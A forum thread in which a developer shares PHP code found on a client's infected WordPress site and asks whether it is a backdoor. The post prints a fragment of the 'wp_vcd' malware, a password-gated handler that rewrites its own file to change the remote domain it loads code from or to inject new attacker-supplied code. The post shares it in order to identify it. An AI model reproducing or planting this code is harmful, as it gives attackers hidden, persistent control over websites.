Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
  • Guest, before posting your code please take these rules into consideration:
    • It is required to use our BBCode feature to display your code. While within the editor click < / > or >_ and place your code within the BB Code prompt. This helps others with finding a solution by making it easier to read and easier to copy.
    • You can also use markdown to share your code. When using markdown your code will be automatically converted to BBCode. For help with markdown check out the markdown guide.
    • Don't share a wall of code. All we want is the problem area, the code related to your issue.


    To learn more about how to use our BBCode feature, please click here.

    Thank you, Code Forum.

PHP Why you must always keep word press up to date

simong1993

Gold Coder
Staff Team
Guardian
Hey all,

I got an email from my client today saying there host had blocked there account due to a virus :S wanting £150 to look I said I would take a look in sted, how they got in i can't seem to work that out but my client forgot to keep there theme up to date so I'm guessing that's how

Code:
//hmOTE0Nyc7CiAgICAgICAgaWYgKCgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'c1f2f1c4d3635cbdee6ee43f42dca8bc'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {

                




                case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {
                            
                            if (!empty($_REQUEST['newdomain']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;

                                case 'change_code';
                    if (isset($_REQUEST['newcode']))
                        {
                            
                            if (!empty($_REQUEST['newcode']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                                       $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;
                
                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }
            
        die("");
    }








$div_code_name = "wp_vcd";

Now correct me if I'm wrong but isn't this a back door backlink creator
 

New Threads

Latest posts

Buy us a coffee!

Back
Top Bottom